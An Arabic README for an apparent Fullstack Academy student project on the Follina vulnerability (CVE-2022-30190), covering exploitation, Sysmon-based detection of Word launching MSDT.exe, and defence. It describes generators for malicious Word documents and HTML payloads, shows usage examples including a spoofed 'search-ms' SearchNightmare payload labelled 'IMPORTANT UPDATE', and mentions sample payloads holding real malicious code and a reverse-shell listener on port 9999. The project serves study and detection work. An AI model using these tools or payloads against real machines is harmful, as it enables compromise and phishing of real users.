
مشروع أمن سيبراني من أكاديمية Fullstack يفحص الدورة الكاملة لثغرة Follina (CVE-2022-30190)، من الاستغلال إلى الكشف والدفاع.
مشروع أمن سيبراني من أكاديمية فولستاك يفحص الدورة الكاملة لثغرة فولينا (CVE-2022-30190)، من الاستغلال إلى الكشف والدفاع.
الفريق:
تفترض هذه المجموعة من الأدوات أن لديك مضيف ويب أو يمكنك تشغيل خادم ويب بسيط باستخدام بايثون لاستضافة ملفات الحمولة المُنشأة أو النموذجية.
الملفات الموجودة في مجلد 'الحمولات النموذجية' تحتوي على كود ضار فعلي. تم استخدامها مع أجهزة افتراضية على شبكة محلية ولا ينبغي أن تسبب مشكلة على شبكة آمنة تثق فيها بجميع الأجهزة، لكن يُرجى توخي الحذر عند استخدام أو تعديل هذه الملفات. بالإضافة إلى ذلك، من الواضح أن مولدات المستندات والحمولات تنشئ ملفات ضارة خاصة بها. يُرجى استخدام هذه الأدوات فقط على أجهزة افتراضية أو بيئات قابلة للتخلص منها! لا تستخدم أي أدوات هنا لا تفهمها.
لإنشاء مستند مايكروسوفت وورد مع استغلال فولينا، قم بتشغيل docgen_v3.py باستخدام الخيارات التالية:
لإنشاء ملف حمولة html، استخدم generate_payload.py مع الأمر الفرعي poc لتوليد حمولة إثبات المفهوم التي تفتح الآلة الحاسبة في ويندوز، أو الأمر الفرعي custom لتوليد حمولة باستخدام سكريبت خاص بك.
أمثلة:
python generate_payload.py poc -o test.html سينشئ حمولة الآلة الحاسبة في test.htmlpython generate_payload.py custom -o test.html -p "search-ms:query=procmon.exe&crumb=location:%5C%5Clive.sysinternals.com%5Ctools&displayname=IMPORTANT%20UPDATE" سينشئ test.html كحمولة مخصصة مع استغلال SearchNightmareيمكن العثور على الحمولات النموذجية في مجلد "الحمولات النموذجية".
يتطلب كشف فولينا تثبيت Sysmon لتسجيل الأحداث. تعتمد طرق الكشف لدينا هنا على العثور على حالات يقوم فيها مايكروسوفت وورد باستدعاء MSDT.exe، ولكن يمكن تعديل السكريبتات للبحث عن أدلة أخرى مثل الوسائط التي تستخدمها فولينا في أمر باورشيل الخاص بها. الأدوات التالية متاحة:
جميع ملفات docx و rtf و html النموذجية موجهة نحو حمولات مستضافة على عنوان IP 10.0.2.15. بالإضافة إلى ذلك، إذا كنت تريد استخدام استغلال الصدفة العكسية، قم بإعداد مستمع على المنفذ 9999.